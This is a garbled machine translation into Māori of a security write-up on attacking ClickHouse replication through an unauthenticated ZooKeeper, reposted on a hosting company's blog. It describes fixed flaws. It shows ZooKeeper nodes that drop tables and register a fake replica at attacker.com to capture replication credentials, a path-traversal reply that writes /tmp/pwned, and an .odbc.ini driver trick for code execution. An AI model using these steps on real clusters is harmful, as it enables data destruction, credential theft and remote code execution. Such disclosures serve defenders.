ProHoster > Блог > Whakahaerenga > He aha koe me kati nga whare kararehe kararehe?

He aha koe me kati nga whare kararehe kararehe?

He aha koe me kati nga whare kararehe kararehe?

Ka hipokina e tēnei tuhinga tētahi ngoikoretanga tino motuhake i roto i te kawa tāruarua ClickHouse, ā, ka whakaaturia me pēhea te whakawhānui ake i te mata o te whakaeke.

He pātengi raraunga a ClickHouse mō te penapena i ngā raraunga nui, e whakamahi ana i ngā tāruarua neke atu i te kotahi. Ko te whakarōpū me te tāruarua i roto i a ClickHouse he mea hanga i runga i te Apache ZooKeeper (ZK) ā, me whai whakaaetanga tuhi.

Kāore e hiahiatia he manatoko mō te tāutanga ZK taunoa, nō reira e wātea ana ki te marea ngā mano tini o ngā tūmau ZK e whakamahia ana mō ngā whirihoranga Kafka, Hadoop, ClickHouse.

Hei whakaiti i te mata o tō whakaeke, me whirihora tonu e koe te manatoko me te whakamanatanga i te wā e tāuta ana i te ZooKeeper.

Heoi anō, tera ētahi 0days e hangai ana ki te wete-rārangi Java, engari whakaarohia ka taea e te kaiwhakaeke te pānui me te tuhi ki te ZooKeeper e whakamahia ana mō te tāruarua ClickHouse.

Ina whirihorahia i te aratau taupū, ka tautoko a ClickHouse i ngā patai tohatoha. DDL, e haere ana i roto i a ZK - mā rātou, ka hangaia ngā pona i roto i te rau /clickhouse/task_queue/ddl.

Hei tauira, ka hangaia e koe he pūnga /clickhouse/task_queue/ddl/query-0001 me ngā ihirangi:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

Whai muri i tēnei, ka mukua te ripanga whakamātautau i ngā tūmau taupū manaaki1 me te manaaki2. Ka tautokona hoki e te DDL te whakahaere i ngā patai CREATE/ALTER/DROP.

He āhua whakamataku? Engari kei hea te kaiwhakaeke e tiki ai i ngā wāhitau tūmau?

Tāruatanga ClickHouse ka mahi i te taumata o ngā ripanga takitahi, nō reira, ina hangaia he ripanga i roto i te ZK, ka tohua te tūmau hei kawenga mō te whakawhiti raraunga me ngā tārua. Hei tauira, ina whakahaerehia he patai (me whirihora te ZK, chXX — te ingoa o te tārua, pūpā — ingoa ripanga):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

ka hangaia ngā pūnga tīwae и raraungameta.

Ihirangi /clickhouse/ripanga/01/foobar/tārua/chXX/kaihautū:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Ka taea te whakakotahi i ngā raraunga mai i tēnei rōpū? Āe, mēnā ko te tauranga tāruarua (TCP/9009) i runga i te tūmau chXX-address Kāore te pareārai ahi e katihia, ā, kāore hoki te manatoko mō te tāruarua e whirihorahia. Me pēhea taku karo i te manatoko?

Ka taea e te kaiwhakaeke te waihanga i tētahi tārua hou i roto i te ZK mā te tārua noa i ngā ihirangi mai i /clickhouse/tables/01-01/foobar/replicas/chXX me te whakarerekē i te tikanga host.

Ihirangi /clickhouse/ripanga/01–01/foobar/tārua/kaiwhakaeke/kaihautū:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Kātahi ka hiahia koe ki te kī atu ki ngā tārua kē atu kei te tūmau a te kaiwhakaeke he poraka raraunga hou me tango e rātou - ka hangaia he pūnga i roto i te ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX (He kaute piki haere tonu a XX, me nui ake i te kaute whakamutunga i roto i te rangitaki takahanga):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

te wahi tārua_pūtake — te ingoa o te tauira a te kaiwhakaeke i hangaia i te taahiraa o mua, poraka_id — tohu poraka raraunga, whiwhi — te whakahau "tiki poraka" (he anei ngā whakahau mō ētahi atu mahi).

Muri iho, ka pānuihia e ia tārua te kaupapa hou i roto i te rangitaki, ā, ka haere ki te tūmau e whakahaerehia ana e te kaiwhakaeke ki te whiwhi i te poraka raraunga (he rua te kawa tārua, e rere ana i runga i te HTTP). attacker.com ka whiwhi i ngā tono:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

Ko XXX ngā raraunga manatoko mō te tāruarua. I ētahi wā, he pūkete pea tēnei e uru atu ana ki te pātengi raraunga mā te kawa matua ClickHouse me te HTTP. E ai ki tāu i kite ai, ka nui haere te mata o te whakaeke nā te mea ka waiho a ZooKeeper, e whakamahia ana mō te tāruarua, me te kore he manatoko kua whirihorahia.

Me titiro tātou ki te mahi mō te tiki i tētahi poraka raraunga mai i tētahi tārua; kua tuhia me te tino māia kei raro i te mana whakahaere tika ngā tārua katoa, ā, kei te whakawhirinaki tonu rātou.

He aha koe me kati nga whare kararehe kararehe?
waehere tukatuka tāruarua

Ka pānuihia e te mahi he rārangi kōnae, kātahi ko ō rātou ingoa, rahi, me ngā ihirangi, kātahi ka tuhia ki te pūnaha kōnae. He mea tika kia whakaahuahia motuhaketia te penapena raraunga i roto i te pūnaha kōnae.

He maha ngā kōpaki iti i roto i /var/lib/clickhouse (whaiaronga rokiroki taunoa mai i te kōnae whirihoranga):

haki — kōpaki mō te tuhi haki, e whakamahia ana mō te whakaora i te ngaronga raraunga;
tmp — he kōpaki mō te penapena i ngā kōnae rangitahi;
ngā kōnae_kaiwhakamahi — ko ngā mahi me ngā kōnae i roto i ngā tono ka herea ki tēnei whaiaronga (INTO OUTFILE me ētahi atu);
raraungameta — ngā kōnae sql me ngā whakaahuatanga ripanga;
ngā whirihoranga_kua_tukatukahia — ngā kōnae whirihoranga whakawhiti i tukatukahia mai i /etc/clickhouse-server;
raraunga — te whaiaronga tuturu me ngā raraunga tonu, i tēnei wā ka hangaia he whaiaronga iti motuhake mō ia pātengi raraunga i konei (hei tauira /var/lib/clickhouse/data/default).

Mō ia ripanga, ka hangaia he kōpaki iti i roto i te kōpaki pātengi raraunga. He kōnae motuhake ia pou i runga i te hōputu miihiniHei tauira, mō tētahi tēpu pūpā, i hangaia e te kaiwhakaeke, ka hangaia ngā kōnae e whai ake nei:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

E tumanako ana te tārua ka whiwhi i ngā kōnae he rite tonu ngā ingoa ina tukatukahia ana he poraka raraunga, ā, kāore e whakamanahia i tētahi ara.

Kua rongo pea te kaipānui aro nui mō te hononga haumaru kore o te ingoa_kōnae i roto i te mahi WriteBufferFromFileAe, mā tēnei ka taea e te kaiwhakaeke te tuhi ihirangi tūpono ki tētahi kōnae kei runga i te pūnaha kōnae me ngā mana kaiwhakamahi. clickhouseHei mahi i tēnei, me whakahoki mai e te tārua e whakahaerehia ana e te kaiwhakaeke te whakautu e whai ake nei ki te tono (kua tāpirihia ngā wehenga rārangi hei māmā ake te mārama):

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

ā, i muri i te honohonotanga ../../../../../../../../../tmp/pwned ka tuhia te kōnae /tmp/pwned me te ihirangi mihi mai i te kaitiaki kararehe.

He maha ngā kōwhiringa hei huri i te tuhi kōnae hei whakahaere waehere mamao (RCE).

Ngā papakupu o waho i roto i te RCE

I ngā putanga tawhito, i rongoatia te whaiaronga tautuhinga ClickHouse me ngā mana kaiwhakamahi. whare clickhouse mā te taunoa. Ko ngā kōnae tautuhinga he kōnae XML ka pānuihia e te ratonga i te tīmatanga, kātahi ka rongoatia ki roto /var/lib/clickhouse/preprocessed_configs. Mēnā ka puta he huringa, ka pānuihia anō. Mēnā kei a koe te urunga ki /etc/clickhouse-server ka taea e te kaiwhakaeke te hanga i tana ake papakupu o waho momo whakahaere, kātahi ka whakahaere i te waehere tūpono. Kāore ngā putanga o nāianei o ClickHouse e tuku i ēnei whakaaetanga mā te taunoa, engari mēnā kua whakahoutia mārire te tūmau, tera pea kei te noho tonu aua whakaaetanga. Mēnā kei te pupuri koe i tētahi rōpū ClickHouse, tirohia ngā whakaaetanga i runga i te whaiaronga tautuhinga; me noho te kaiwhakamahi ki reira. root.

ODBC i roto i te RCE

I te tāutanga o tētahi mōkihi, ka hangaia he kaiwhakamahi clickhouse, engari kāore anō kia waihangatia tōna whaiaronga kāinga /nonexistentHeoi, ina whakamahi ana i ngā papakupu o waho, mō ētahi atu take rānei, ka hangaia e ngā kaiwhakahaere he rarangi pukapuka /nonexistent ā, ka hoatu ki te kaiwhakamahi clickhouse urunga tuhi ki reira (SSZB! āhua. kaiwhakamaori).

Ngā tautoko a ClickHouse ODBC ā, ka taea te hono atu ki ētahi atu pātengi raraunga. I roto i te ODBC, ka taea e koe te tohu i te ara ki te whare pukapuka me te taraiwa pātengi raraunga (.so). Nā ngā putanga tawhito o ClickHouse i taea ai tēnei te mahi tika i roto i te kaiwhakahaere patai, engari kua tāpirihia inaianei he tirotiro aho hononga pakari ake i roto i odbc-bridge, nō reira, kāore e taea te tohu i te ara taraiwa mai i tētahi tono. Engari ka taea e te kaiwhakaeke te tuhi ki te whaiaronga kāinga mā te whakamahi i te ngoikoretanga kua whakaahuatia i runga ake nei?

Me hanga he kōnae ~/.odbc.ini me nga ihirangi penei:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

kātahi ka tīmata SELECT * FROM odbc('DSN=lalala', 'test', 'test'); ka utaina te whare pukapuka test.so ā, i whiwhi i te RCE (ngā mihi buglloc (mō te pito).

Kua whakatikahia ēnei ngoikoretanga me ētahi atu ngoikoretanga i roto i te ClickHouse putanga 19.14.3. Kia tiakina ō ClickHouse me ō ZooKeepers!

Source: will.com

Hokona te manaaki pono mo nga waahi me te tiaki DDoS, nga kaiwhakarato VPS VDS 🔥 Hokona he manaaki paetukutuku pono me te tiakitanga DDoS, ngā tūmau VPS VDS | ProHoster